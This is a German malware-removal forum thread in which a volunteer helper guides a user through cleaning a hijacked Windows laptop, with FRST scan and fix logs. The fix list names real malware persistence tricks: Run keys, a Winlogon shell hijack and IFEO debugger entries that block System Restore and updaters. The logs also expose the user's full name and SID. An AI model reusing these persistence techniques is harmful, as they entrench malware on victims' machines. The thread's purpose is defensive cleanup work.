FirewallRules: [{39DD858C-C5D5-4F81-88A5-638EAE48C1E2}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\farcry3.exe
FirewallRules: [{43C8EB70-C312-4BD4-98CF-A5D3E0A93072}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\farcry3_d3d11.exe
FirewallRules: [{13B756F9-75C0-4EEF-B149-81630829BF6B}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\farcry3_d3d11.exe
FirewallRules: [{CD142FC9-8278-4D60-822B-AC672B222BCC}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\FC3Updater.exe
FirewallRules: [{EED51691-BE3C-45CE-AE8E-A7D9CF8939E3}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\FC3Updater.exe
FirewallRules: [{1C86D69B-F99E-4AB0-9433-9823D1D6C77B}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\FC3Editor.exe
FirewallRules: [{9979D1DF-0F9C-4992-BA47-0A5506E83682}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\FC3Editor.exe
FirewallRules: [{0E7EF26A-91E2-4A99-A124-767A4E59B4C6}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{B50E54E0-7F56-45FF-B941-F4291BC08032}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{EF6BDB74-45D8-46B1-B87C-1FDEE35C6A51}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{EF947C32-1D81-4E83-A695-A9EC9219A3B3}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [TCP Query User{653CFC91-4BAB-4C40-9B9E-01CC50B98589}C:\program files (x86)\ubisoft\far cry 4\bin\farcry4.exe] => (Block) C:\program files (x86)\ubisoft\far cry 4\bin\farcry4.exe
FirewallRules: [UDP Query User{B0BC62AE-48DE-42C7-8668-5DD556C0A6B7}C:\program files (x86)\ubisoft\far cry 4\bin\farcry4.exe] => (Block) C:\program files (x86)\ubisoft\far cry 4\bin\farcry4.exe
FirewallRules: [{58DF4819-F2AA-4B93-A157-40849EF94D29}] => (Allow) C:\Windows\system32\rundll32.exe
FirewallRules: [{CBE7A874-9528-4366-AF1B-A0E916028D13}] => (Allow) C:\Users\Nick Schuster\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [{1BBF6F32-C108-4369-941D-843982F303E5}] => (Allow) C:\Users\Nick Schuster\Downloads\mb3-setup-consumer-3.1.2.1733-1.0.122-1.0.1976.exe
FirewallRules: [{02B3354A-24E5-4248-8037-D10EC7114CDA}] => (Allow) C:\Users\Nick Schuster\Downloads\mb3-setup-consumer-3.1.2.1733-1.0.122-1.0.1976.exe
FirewallRules: [{ACFC7F43-1E24-4A37-BB80-4D2F71DFD6AC}] => (Allow) C:\Users\Nick Schuster\Downloads\mb3-setup-consumer-3.1.2.1733-1.0.122-1.0.1976.exe
FirewallRules: [{F3EB4D70-44AB-440F-99BE-EC17A5897398}] => (Allow) C:\Users\Nick Schuster\Downloads\mb3-setup-consumer-3.1.2.1733-1.0.122-1.0.1976.exe
FirewallRules: [{A3408888-D09A-47E4-AC38-D0F7F8F347D3}] => (Allow) C:\Program Files (x86)\MIO\loader\hgstxhts721010a9e630_jr10206p1v048m1v048mx.dat
FirewallRules: [{54CC17EB-AE90-4BB9-8A39-D37C3E50D836}] => (Allow) C:\Program Files (x86)\MIO\loader\hgstxhts721010a9e630_jr10206p1v048m1v048mx.dat
FirewallRules: [{33955FCC-97B4-465B-9229-AD6D73EAB1BE}] => (Allow) C:\Program Files (x86)\Applemy\Application\chrome.exe
FirewallRules: [{2C27DBA5-D9A5-4D9B-80D2-3B9661ED9A62}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{BB1CF779-C524-42C1-A743-1CB20B08A776}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
FirewallRules: [{196D459B-065E-4C43-B5EE-C2CC1E695E7D}] => (Allow) C:\Games\World_of_Tanks\WoTLauncher.exe
FirewallRules: [{3A92A8FE-FCEB-4D7E-80F0-A01A04153F43}] => (Allow) C:\Games\World_of_Tanks\WoTLauncher.exe
FirewallRules: [{89ADB8E5-F4F0-4742-9645-488983FC8305}] => (Allow) C:\Games\World_of_Tanks\worldoftanks.exe
FirewallRules: [{89C45FD5-138C-4396-9FE4-D2DD77FA8B3B}] => (Allow) C:\Games\World_of_Tanks\worldoftanks.exe
FirewallRules: [{FEEE5642-D6D5-4948-BA55-60DFADB5A8F1}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{1BD71208-FB0F-4AD8-822C-931C6B404E36}] => (Allow) C:\Windows\System32\rundll32.exe

==================== Wiederherstellungspunkte =========================

28-05-2017 11:43:38 Windows Update
28-05-2017 20:39:08 DirectX wurde installiert
30-05-2017 14:03:51 Removed Samsung Kies
31-05-2017 17:31:09 Removed Vegas Pro 13.0 (64-bit)
01-06-2017 21:49:48 Installed NetAdapterUpdate

==================== Fehlerhafte Ger鋞e im Ger鋞emanager =============

Name: 
Description: 
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: USB2.0-CRW
Description: USB2.0-CRW
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Fehlereintr鋑e in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (06/05/2017 10:10:37 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RAZERLAP)
Description: Bei der Aktivierung der App „microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1“ ist folgender Fehler aufgetreten: -2144927141. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (06/05/2017 10:10:31 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RAZERLAP)
Description: Bei der Aktivierung der App „microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1“ ist folgender Fehler aufgetreten: -2144927141. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (06/05/2017 10:10:31 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RAZERLAP)
Description: Bei der Aktivierung der App „microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1“ ist folgender Fehler aufgetreten: -2144927141. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (06/05/2017 10:10:31 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: LiveComm.exe, Version: 17.5.9600.20911, Zeitstempel: 0x559467ee
Name des fehlerhaften Moduls: msvcr120_app.dll, Version: 12.0.21005.1, Zeitstempel: 0x524f8432
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000000000001ef5f
ID des fehlerhaften Prozesses: 0x2ac
Startzeit der fehlerhaften Anwendung: 0x01d2ddd3335f8f65
Pfad der fehlerhaften Anwendung: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
Pfad des fehlerhaften Moduls: C:\Program Files\WindowsApps\Microsoft.VCLibs.120.00_12.0.21005.1_x64__8wekyb3d8bbwe\msvcr120_app.dll
Berichtskennung: 710e7cdb-49c6-11e7-8421-0071c2420bd3
Vollst鋘diger Name des fehlerhaften Pakets: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: ppleae38af2e007f4358a809ac99a64a67c1

Error: (06/05/2017 10:10:26 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: LiveComm.exe, Version: 17.5.9600.20911, Zeitstempel: 0x559467ee
Name des fehlerhaften Moduls: msvcr120_app.dll, Version: 12.0.21005.1, Zeitstempel: 0x524f8432
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000000000001ef5f
ID des fehlerhaften Prozesses: 0x9e8
Startzeit der fehlerhaften Anwendung: 0x01d2ddd3306276e0
Pfad der fehlerhaften Anwendung: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
Pfad des fehlerhaften Moduls: C:\Program Files\WindowsApps\Microsoft.VCLibs.120.00_12.0.21005.1_x64__8wekyb3d8bbwe\msvcr120_app.dll
Berichtskennung: 6e11652d-49c6-11e7-8421-0071c2420bd3
Vollst鋘diger Name des fehlerhaften Pakets: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: ppleae38af2e007f4358a809ac99a64a67c1

Error: (06/05/2017 10:10:25 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: LiveComm.exe, Version: 17.5.9600.20911, Zeitstempel: 0x559467ee
Name des fehlerhaften Moduls: msvcr120_app.dll, Version: 12.0.21005.1, Zeitstempel: 0x524f8432
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000000000001ef5f
ID des fehlerhaften Prozesses: 0xe90
Startzeit der fehlerhaften Anwendung: 0x01d2ddd32fca7917
Pfad der fehlerhaften Anwendung: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
Pfad des fehlerhaften Moduls: C:\Program Files\WindowsApps\Microsoft.VCLibs.120.00_12.0.21005.1_x64__8wekyb3d8bbwe\msvcr120_app.dll
Berichtskennung: 6d7ff507-49c6-11e7-8421-0071c2420bd3
Vollst鋘diger Name des fehlerhaften Pakets: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: ppleae38af2e007f4358a809ac99a64a67c1

Error: (06/05/2017 10:09:29 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RAZERLAP)
Description: Bei der Aktivierung der App „microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1“ ist folgender Fehler aufgetreten: -2144927141. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (06/05/2017 10:09:29 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RAZERLAP)
Description: Bei der Aktivierung der App „microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1“ ist folgender Fehler aufgetreten: -2144927141. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (06/05/2017 10:09:29 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RAZERLAP)
Description: Bei der Aktivierung der App „microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1“ ist folgender Fehler aufgetreten: -2144927141. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (06/05/2017 10:09:25 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: LiveComm.exe, Version: 17.5.9600.20911, Zeitstempel: 0x559467ee
Name des fehlerhaften Moduls: msvcr120_app.dll, Version: 12.0.21005.1, Zeitstempel: 0x524f8432
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000000000001ef5f
ID des fehlerhaften Prozesses: 0xe98
Startzeit der fehlerhaften Anwendung: 0x01d2ddd30c280235
Pfad der fehlerhaften Anwendung: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
Pfad des fehlerhaften Moduls: C:\Program Files\WindowsApps\Microsoft.VCLibs.120.00_12.0.21005.1_x64__8wekyb3d8bbwe\msvcr120_app.dll
Berichtskennung: 49d6f117-49c6-11e7-8421-0071c2420bd3
Vollst鋘diger Name des fehlerhaften Pakets: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: ppleae38af2e007f4358a809ac99a64a67c1


Systemfehler:
=============
Error: (06/05/2017 10:10:48 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Google Update-Dienst (gupdate)" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (06/05/2017 10:10:32 AM) (Source: DCOM) (EventID: 10010) (User: RAZERLAP)
Description: Der Server "Microsoft.WindowsLive.Mail.AppXj3e9v0xw9sf8t58nqr15tqqb2yq4zsfg.mca" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (06/05/2017 10:10:27 AM) (Source: DCOM) (EventID: 10010) (User: RAZERLAP)
Description: Der Server "Microsoft.WindowsLive.Mail.AppXj3e9v0xw9sf8t58nqr15tqqb2yq4zsfg.mca" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (06/05/2017 10:10:26 AM) (Source: DCOM) (EventID: 10010) (User: RAZERLAP)
Description: Der Server "Microsoft.WindowsLive.Mail.AppXj3e9v0xw9sf8t58nqr15tqqb2yq4zsfg.mca" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (06/05/2017 10:09:27 AM) (Source: DCOM) (EventID: 10010) (User: RAZERLAP)
Description: Der Server "Microsoft.WindowsLive.Mail.AppXj3e9v0xw9sf8t58nqr15tqqb2yq4zsfg.mca" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (06/05/2017 10:09:25 AM) (Source: DCOM) (EventID: 10010) (User: RAZERLAP)
Description: Der Server "Microsoft.WindowsLive.Mail.AppXj3e9v0xw9sf8t58nqr15tqqb2yq4zsfg.mca" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (06/05/2017 10:09:24 AM) (Source: DCOM) (EventID: 10010) (User: RAZERLAP)
Description: Der Server "Microsoft.WindowsLive.Mail.AppXj3e9v0xw9sf8t58nqr15tqqb2yq4zsfg.mca" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (06/05/2017 10:09:13 AM) (Source: DCOM) (EventID: 10010) (User: RAZERLAP)
Description: Der Server "App.AppX2tphb21dp9jkkycchwvscnrxk12cys3z.mca" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (06/05/2017 10:09:11 AM) (Source: DCOM) (EventID: 10016) (User: RAZERLAP)
Description: Durch die Berechtigungseinstellungen f黵 "Anwendungsspezifisch" wird dem Benutzer "RAZERLAP\Nick Schuster" (SID: S-1-5-21-3847841184-804715454-2304624315-1001) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Start" f黵 die COM-Serveranwendung mit der CLSID 
{7022A3B3-D004-4F52-AF11-E9E987FEE25F}
 und der APPID 
{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}
 im Anwendungscontainer "Nicht verf黦bar" (SID: Nicht verf黦bar) gew鋒rt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool f黵 Komponentendienste ge鋘dert werden.

Error: (06/05/2017 10:08:35 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Microsoft Cache Service" wurde mit folgendem Fehler beendet: 
Das System kann die angegebene Datei nicht finden.


CodeIntegrity:
===================================
  Date: 2017-05-03 18:07:17.434
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-05-03 18:06:29.117
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-05-03 17:37:01.065
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-05-03 17:37:00.358
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-05-03 17:24:33.560
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-05-03 15:20:35.981
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-03-30 16:06:23.178
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-03-30 14:48:35.444
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-03-30 14:48:35.282
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-03-30 14:48:35.275
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Core(TM) i5-5200U CPU @ 2.20GHz
Prozentuale Nutzung des RAM: 42%
Installierter physikalischer RAM: 4014.84 MB
Verf黦barer physikalischer RAM: 2290.85 MB
Summe virtueller Speicher: 4718.84 MB
Verf黦barer virtueller Speicher: 3056.02 MB

==================== Laufwerke ================================

Drive c: (NexusLap) (Fixed) (Total:869.8 GB) (Free:750.58 GB) NTFS
Drive d: (Recover) (Fixed) (Total:60 GB) (Free:42.31 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: B8E472D2)

Partition: GPT.

==================== Ende von Addition.txt ============================
         

Alt 05.06.2017, 14:22   #7
M-K-D-B
/// TB-Ausbilder
 
wie kann ich den  ,,initialpage123创 virus beseitigen? - Standard

wie kann ich den ,,initialpage123创 virus beseitigen?



Servus



Zitat:
(...) aber ich kann den tdss.killer immer noch nicht starten.
Ich wei. Die Schadsoftware blockiert so gut wie alle Sicherheitssoftware.

Dein Rechner hat so viel Adware, das ist deutschlandweit bestimmt ein Spitzenplatz...







Schritt 1
  • Im Anhang meines Posts findest du die Datei fixlist.txt. Speichere diese Datei im selben Verzeichnis, indem sich die FRST.exe befindet.
  • Starte die FRST.exe erneut.
  • Klicke auf den Button Entfernen.
  • Der Entfernungsprozess startet, dein Rechner ben鰐igt am Ende einen Neustart.
  • Nach dem Neustart findest du eine Datei fixlog.txt im selben Verzeichnis, in der sich auch die FRST.exe befindet.
  • Poste mir den Inhalt dieser Datei mit deiner n鋍hsten Antwort.





Schritt 2
Downloade Dir bitte AdwCleaner auf deinen Desktop.
  • Schlie遝 alle offenen Programme und Browser.
  • Starte die adwcleaner.exe mit einem Doppelklick.
  • Stimme den Nutzungsbedingungen zu.
  • Klicke auf Werkzeuge > Optionen und vergewissere dich, dass die folgenden Punkte ausgew鋒lt sind:
    • Image File Execution Options Schl黶sel
    • "Tracing" Schl黶sel
    • "Prefetch" Dateien
    • Proxy
    • Winsock
    • Firewall
    • Internet Explorer Richtlinien
    • Chrome Richtlinien
    • Chrome Einstellungen
    • Hosts-Datei
  • Best鋞ige die Auswahl mit Ok.
  • Klicke auf Suchlauf und warte bis dieser abgeschlossen ist.
  • Klicke nun auf L鰏chen (auch dann wenn AdwCleaner sagt, dass nichts gefunden wurde) und best鋞ige auftretende Hinweise mit Ok.
  • Dein Rechner wird automatisch neu gestartet. Nach dem Neustart 鰂fnet sich eine Textdatei. Poste mir deren Inhalt mit deiner n鋍hsten Antwort.
  • Die Logdatei findest du auch unter C:\AdwCleaner\AdwCleaner[Cx].txt. (x = fortlaufende Nummer).





Schritt 3
Downloade Dir bitte Malwarebytes Anti-Malware 3
  • Installiere das Programm in den vorgegebenen Pfad.
  • Starte Malwarebytes' Anti-Malware (MBAM).
  • Klicke im Anschluss auf Scan, w鋒le den Bedrohungs-Scan aus und klicke auf Scan starten.
  • Lass am Ende des Suchlaufs alle Funde (falls vorhanden) in die Quarant鋘e verschieben. Klicke dazu auf Ausgew鋒lte Elemente in die Quarant鋘e verschieben.
  • Lass deinen Rechner ggf. neu starten, um die Bereinigung abzuschlie遝n.
  • Starte MBAM nach dem Neustart, klicke auf Berichte.
  • W鋒le den neuesten Scan-Bericht aus, klicke auf Bericht anzeigen und dann auf Export.
  • W鋒le Textdatei (.txt) aus und speichere die Datei als mbam.txt auf dem Desktop ab.
  • F黦e den Inhalt der mbam.txt mit deiner n鋍hsten Antwort hinzu.





Schritt 4
  • Starte die FRST erneut. Vergewissere dich, dass vor Addition.txt ein Haken gesetzt ist und dr點ke auf Untersuchen.
  • FRST erstellt nun zwei Logdateien (FRST.txt und Addition.txt).
  • Poste mir beide Logdateien mit deiner n鋍hsten Antwort.






Bitte poste mit deiner n鋍hsten Antwort
  • die Logdatei des FRST-Fix,
  • die Logdatei von AdwCleaner,
  • die Logdatei von MBAM,
  • die beiden neuen Logdateien von FRST.
Angeh鋘gte Dateien
Dateityp: txt fixlist.txt (96,7 KB, 162x aufgerufen)
__________________
Gru
M-K-D-B


==========================================================
offline vom 22.12.2018 bis 01.01.2019
==========================================================

Das Trojaner-Board unterst黷zen

Alt 05.06.2017, 17:06   #8
NexsReloaded
 
wie kann ich den  ,,initialpage123创 virus beseitigen? - Standard

wie kann ich den ,,initialpage123创 virus beseitigen?



du schreibst ich soll die datei im selben verzeichniss wie die frst.exe speichern also w鋜 der desktop ja richtig?

Code:
ATTFilter
Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version: 02-06-2017
durchgef黨rt von Nick Schuster (05-06-2017 15:34:37) Run:1
Gestartet von C:\Users\Nick Schuster\Desktop\Neuer Ordner
Geladene Profile: Nick Schuster (Verf黦bare Profile: Nick Schuster)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
CloseProcesses:
HKLM\...\Run: [gplyra] => C:\Users\Nick Schuster\AppData\Roaming\gplyra\gplyra.exe [1555968 2017-04-24] () <===== ACHTUNG
C:\Users\Nick Schuster\AppData\Roaming\gplyra
HKLM-x32\...\Run: [KMS] => C:\Windows\kmsonboot\autoact.exe
C:\Windows\kmsonboot
HKLM\...\RunOnce: [RAZERLAP] => C:\Windows\TEMP\gB39B.tmp.exe [307200 2017-06-05] () <===== ACHTUNG
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\RunOnce: [windows] => C:\ProgramData\windows\windows.exe [1052256 2017-01-03] ()
C:\ProgramData\windows
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\MountPoints2: {3b90a8ba-330f-11e7-83e4-0071c2420bd3} - "F:\autorun.exe" 
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\MountPoints2: {e8e722cc-412b-11e7-840b-0071c2420bd3} - "F:\OriginInstaller.exe" 
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\Winlogon: [Shell] explorer.exe,"C:\Users\Nick Schuster\AppData\Roaming\avv.exe" <==== ACHTUNG
C:\Users\Nick Schuster\AppData\Roaming\avv.exe
HKU\S-1-5-18\...\Run: [sG4nE4Ad85qJ.exe] => C:\ProgramData\e9cf343f516c47a4a7255147ad1dcd13\sG4nE4Ad85qJ.exe [216576 2017-05-30] ()
C:\ProgramData\e9cf343f516c47a4a7255147ad1dcd13
HKLM\...\Providers\6ddy6fjk: C:\Program Files (x86)\Qizsywosale Core\local64spl.dll [306688 2017-03-17] ()
C:\Program Files (x86)\Qizsywosale Core
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
IFEO\rstrui.exe: [Debugger] rrtuy.exe
ShellExecuteHooks: Kein Name - {5EBD559E-A5BA-11E6-B9FD-64006A5CFC23} - C:\Users\Nick Schuster\AppData\Roaming\Phucusy\Pipothzo.dll -> Keine Datei
C:\Users\Nick Schuster\AppData\Roaming\Phucusy
ShellExecuteHooks: Kein Name - {9C829CE8-039A-11E7-8F7F-64006A5CFC23} - C:\Users\Nick Schuster\AppData\Roaming\Anerpe\Zoduly.dll -> Keine Datei
C:\Users\Nick Schuster\AppData\Roaming\Anerpe
ShellExecuteHooks: Kein Name - {234628B4-4048-11E7-9F2C-64006A5CFC23} - C:\Users\Nick Schuster\AppData\Roaming\Grerdaentlerveck\Thuvale.dll -> Keine Datei
C:\Users\Nick Schuster\AppData\Roaming\Grerdaentlerveck
ShellExecuteHooks: Kein Name - {A4CD8824-4049-11E7-9F11-64006A5CFC23} - C:\Users\Default\AppData\Roaming\Minerent\Wuteghtplejipy.dll [144896 2017-05-30] ()
C:\Users\Default\AppData\Roaming\Minerent
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Nick Schuster\AppData\Local\MEGAsync\ShellExtX64.dll -> Keine Datei
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Nick Schuster\AppData\Local\MEGAsync\ShellExtX64.dll -> Keine Datei
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Nick Schuster\AppData\Local\MEGAsync\ShellExtX64.dll -> Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt9] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Keine Datei
ShellIconOverlayIdentifiers: [KzShlobj] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} =>  -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Nick Schuster\AppData\Local\MEGAsync\ShellExtX32.dll -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Nick Schuster\AppData\Local\MEGAsync\ShellExtX32.dll -> Keine Datei
